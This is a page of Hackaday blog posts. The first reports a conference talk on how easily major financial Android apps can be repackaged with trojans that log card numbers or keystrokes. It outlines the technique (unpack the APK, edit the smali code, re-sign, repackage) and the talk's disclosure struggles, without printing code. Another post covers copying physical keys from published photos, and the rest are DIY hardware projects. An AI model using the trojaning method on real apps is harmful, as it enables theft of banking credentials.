The Ease Of Adding Trojans To Major Financial Android Apps

May 24, 2015 by Mike Szczys 17 Comments

This was both an amusing and frightening talk. [Sam Bowne] presented How to Trojan Financial Android Apps on Saturday afternoon at the LayerOne Conference. [Sam] calculates that 80-90% of the apps provided by major financial institutions like banks and investment companies are vulnerable and the ease with which trojans can be rolled into them is incredible.

Some Background

[Sam] did a great job of concisely describing the circumstances that make Android particularly vulnerable to the attacks which are the subject of the talk. Android programs are packaged as APK files which are easy to unpack. The “compiled” code itself is called smali and is readable in a similar way as Java. It’s super easy to unpack and search this byte code using grep. Once the interesting parts are located, the smali code can be altered and the entire thing can be repackaged. The app will need to be resigned but Google doesn’t control the signing keys so an attacker can simply generate a new key and use that to sign the app. The user still needs to install the file, but Android allows app installation from webpages, email, etc. so this isn’t a problem for the bad guys either.

The Attack

So what can be done? This is about information harvesting. [Sam’s] proof of concept uses a python script to insert logging for every local variable. The script looks at the start of every module in the smali code, grabs the number of local variables, increments it by one and uses this extra variable to write out the values through logcat.

bank-of-america-logcat — ADB Log shows the Credit Card Number

He demonstrated live on the Bank of America app. From the user side of things it looks exactly like the official app, because it is the official app. However, when you register your account the log reports the card number as you can see here. Obviously this information could easily be phoned-home using a number of techniques.

As mentioned, the vast majority of banking and financial apps are vulnerable to this, but some have made an attempt to make it more difficult. He found the Bancorp app never exposes this information in local variables so it can’t just be logged out. However, the same trojan technique works as a keylogger since he found the same function kept getting called every time a key is pressed. The same was true of the Capital One app, but it echos out Google’s Android keymap values rather than ascii; easy enough to translate back into readable data though.

The Inability to Report Vulnerabilities

What is the most troubling is that none of these companies have a means of reporting security vulnerabilities. It was amusing to hear [Sam] recount his struggle to report these issues to Charles Schwab. Online contact forms were broken and wouldn’t post data and several publicly posted email addresses bounced email. When he finally got one to accept the email he later discovered another user reporting on a forum that nobody ever answers back on any of the Schwab accounts. He resorted to a trick he has used many times in the past… Tweeting to the CEO of Charles Schwab to start up a direct-message conversation. This itself is a security problem as @SwiftOnSecurity proves by pointing out that whenever @SamBowne Tweets a CEO it’s because he found a vulnerability in that company’s platform and can’t find a reasonable way to contact the company.

There is Hope

Although very rare, sometimes these apps do get patched. The Trade King app was updated after his report and when [Sam] tried the exploit again it crashes at start-up. The log reports a verification failure. This indicates that the injected code is being noticed, but [Sam] wonders if the verification is included in the app itself. If it is, then it will be possible to track it down and disable it.

This may sound like all of us Android users should despair but that’s not the case. Adding verification, even if it’s possible to defeat it, does make the apps safer; attackers may not want to invest the extra time to try to defeat it. Also, there are obsfucators available for a few thousand dollars that will make these attacks much more difficult by making variable names unreadable. The free obsfucator available now with the Android development suites doesn’t change names of everything… local variables are left unaltered and programmers have a habit of using descriptive names for variables. For instance, BofA used “CARDNUM” in the example above.

The Slides

[Sam Bowne’s] slides and testing results for the entire talk are available under the “Upcoming Events” part of his website.

Absolute Overkill IKEA Lampan Lamp Hack

May 24, 2015 by Elliot Williams 5 Comments

Sometimes too much overkill isn’t enough. [Jesus Echavarria] hacked an IKEA Lampan light for his daughter to add color LEDs, a timer, Bluetooth control over the hue, and a local override knob. The result: a $5 lamp with at least $50 of added awesomeness. Let’s have a look at the latter.

The whole lamp system is based around a PIC microcontroller and WS2811 LEDs for the color light show. Since the lamp was already built to run a 40W lightbulb, and [Jesus] wanted to retain that functionality, he added an SSR to the build. Yeah, it’s rated for 5,000W, but it’s what he had on hand.

Next comes the low-voltage power supply. [Jesus] needed 5V for the PIC, and used the guts from a cheap USB charger as a quick and dirty 5V converter — a nice hack. To power the HC-05 Bluetooth module, which requires 3.3V, he wired up a low-dropout voltage regulator to the 5V line. A level-converter IC (74LVC07) gets the logic voltage levels straight between the two.

A fuse for the high-voltage power line, screw-terminal connectors all around, and a potentiometer for manual override round out the hardware build.

On the software side, [Jesus] set up the knob to turn on and off the built-in lamp as well as control the colors of the LED ring. That’s a nice touch for when his daughter wants to change the lamp’s color, but doesn’t want to go find her cellphone. But when she does, the SPP Pro app sets the colors by sending pre-programmed serial commands over Bluetooth to the PIC in the lamp.

All in all, a nice build, well-documented, and with enough rough edges that none of you out there can say it’s not a hack. Nice job [Jesus]! We can’t wait to see what he does next… robot lamp anyone?

Spin DIY Photography Turntable System

May 24, 2015 by Anool Mahidharia 14 Comments

A motorised turntable is very handy when taking product pictures, or creating animated GIF’s or walk around views. [Tiffany Tseng] built Spin, a DIY photography turntable system for capturing how DIY Projects come together over time. It is designed to help people share their projects in an engaging way through creating GIF’s and videos which will be easy to post on social networks like Twitter and Facebook.

The device is a lazy susan driven by a stepper motor controlled via an Arduino and an Easy Driver motor driver shield. The Spin system utilizes the Soft Modem library to send signals from an iPhone to the Arduino. This connects the Arduino to the iPhone via the audio socket on the phone. The Spin iOS app is currently in Beta and is invite only. After you’ve built your own Spin turntable, take a picture of it and request the app. Of course, there are many different ways of controlling the motor so if you are handy, you can build your own controller. But [Tiffany]’s iOS app provides a way to stitch the various images to form an animated GIF and then share them easily. Building the turntable should be straightforward if you grab the design files from the github repo, follow the detailed instructions on the build page, and have access to a laser cutter and a 3D printer.

Check out a few similar turntable hacks we’ve featured in the past, such as one that uses the motor from a scanner, an attempt that just didn’t end up working smoothly, and one that uses a belt-drive system. There’s a video of the turntable in action after the break.

Continue reading “Spin DIY Photography Turntable System” →

Hackaday Prize Entry: Arduino MPPT Controller

May 23, 2015 by Brian Benchoff 17 Comments

Imagine you’re building a small solar installation. The naive solution would be grabbing a solar panel from Horror Freight, getting a car battery and AC inverter, and hoping everything works. This is the dumb solution. To get the most out of a solar you need to match the voltage of the solar cell to the voltage of the battery. How do you do that? With [Debasish]’s entry for The Hackaday Prize, an Arduino MPPT Solar Charge Controller.

This Maximum Power Point Tracker uses a buck converter to step down the voltage from the solar cell to the voltage of the battery. It’s extremely efficient and every proper solar installation will need a charge controller that does something similar.

For his MPPT, [Debasish] is using an Arduino Nano for all the math, a DC to DC buck converter, and a few MOSFETs. Extremely simple, but [Debasish] is connecting the entire controller to the Internet with an ESP8266 module. It’s a great example of building something for much less than it would cost to buy the same thing, and a great example for something that has a chance at making the world a little better.

The 2015 Hackaday Prize is sponsored by:

NES Controller Made Out Of Fused Craft Beads

May 23, 2015 by Rich Bremer 8 Comments

Close your eyes and think back, far back when you were a wee kid. Remember those colored beads that a child would populate on a small plastic peg board, arranged in some sort of artsy pattern, then ironed to fuse the beads together into a crafty trinket? They were fun for kids but what good are they to us adults nowadays? Well, [Lalya] has shown that they can be used to make a unique and interesting NES Controller.

First, the controller’s front panel was laid out on the pegboard, remembering to lay it out in reverse so the melted side of the beads was facing into the controller. Holes were left in the top panel for the D-pad and B/A buttons. The sides, back and bottom panels of the controller were made the same way. Hot glue holds the case panels together.

Inside the case is an Arduino and breadboard with three through-hole momentary buttons. These are wired up to the Arduino inputs and a sketch emulates keystrokes when connected to a computer. Unfortunately, the D-pad’s functionality is just a button right now. [Lalya] uses the project to control iTunes. Maybe the next revision will be more video game friendly.

Having your own NES controller recreation might not be high on your list. But you have to admit that this s a pretty simple and inexpensive way to make custom enclosures.

3D Scanning Rig And DIY Turntable

May 23, 2015 by Rich Bremer 11 Comments

It seems almost every day 3D scanning is becoming more and more accessible to the general DIYer. The hardware required is minimal and there are several scanning softwares and workflows to choose from. However, if you have slowly walked around a subject while holding a Kinect and trying to get a good scan, you know this is not an easy task. A quick internet search will result in several DIY scanning setup solutions that have been cobbled together and lack substantial documentation…. until now! [aldricnegrier] is fighting back and has designed and documented a rotary table that will spin at a constant speed while a subject is 3D scanned, making person scanning just that much easier.

The project starts off with a plywood base with a Lazy Susan bearing assembly attached to the top. The Lazy Susan supports the rotating platform for the subject person to stand on, but it’s not just a platform, it’s also a huge gear! The platform teeth mesh with a much smaller 3D printed gear mounted on the shaft of a DC motor and reduction gearbox assembly.

Another goal of the project was to make the rotary table autonomous. There is an ultrasonic sensor mounted to the base aimed above the rotating platform. The ultrasonic sensor is connected to an Arduino and if the system senses someone or something on the platform for 3 seconds, the Arduino will command a DC motor driver to start spinning the platform.

As cool as this project is so far, [aldricnegrier] wanted to make it even cooler: he added speech recognition. Using Microsoft’s Speech Toolkit, saying the words ‘Start Skanect‘ will start the scanning process on the PC. Now, a sole person can scan themselves easily and reliably.

[aldricnegrier] has made all of his CAD files, STL files and Arduino code available so anyone wanting to build this clearly capable setup can do so!

Pictures That Defeat Key Locks

May 23, 2015 by Mike Szczys 65 Comments

We’re at LayerOne this weekend and one of the talks we were excited about didn’t disappoint. [Jos Weyers] presented Showing Keys in Public — What Could Possibly Go Wrong? The premise is that pictures of keys, in most cases, are as good as the keys themselves. And that pictures of keys keep getting published.

[Jos] spoke a bit about new services that offer things like 3D scanning and storage of your key for printing when you get locked out, or apps that ask you to take a picture of your key and they’ll mail you a duplicate. Obviously this isn’t the best of ideas; you’re giving away your passwords. And finding a locksmith is easier than findind a 3D printer. But it’s the media gaffs with important keys that intrigues us.

We’ve already seen the proof of concept for taking covert images to perfectly duplicate a key. But these examples are not so covert. One example is a police officer carrying around handcuff keys on a belt clip. Pose for a picture and that key design is now available to all. But news stories about compromised keys are the biggest offenders.

A master key for the NYC Subway was compromised and available for sale. The news coverage not only shows a picture at the top of the story of a man holding up the key straight on, but this image of it on a subway map which can be used to determine scale. This key, which is still published openly on the news story linked above, opens 468 doors to the subway system and these are more than just the ones that get you onto the platform for free. We were unable to determine if these locks have been changed, but the sheer number of them has us thinking that it’s unlikely.

Worse, was the availability of fire-department ~~master~~ keys ~~which open lock boxes outside of every building~~. (Correction: these are fire department keys but not the actual lock-box keys) A locksmith used to cut the original keys went out of business and sold off all their stock. These keys were being sold for $150, which is bad enough. But the news coverage showed each key on a white background, straight on, with annotations of where each type of key will work.

Other examples include video news stories about credit card skimmers installed in gas pumps — that coverage showed the key used to open the pump housing. There was also an example of speed camera control cabinet keys being shown by a reporter.

[Jos’] example of doing the right thing is to use a “prop” key for news stories. Here he is posing with a key after the talk. Unfortunately this is my own house key, but I’m the one taking pictures and I have blurred the teeth for my own security. However, I was shocked during image editing at the quality of the outline in the image — taken at 6000×4000 with no intent to make something that would serve as a source for a copy. It still came out remarkably clear.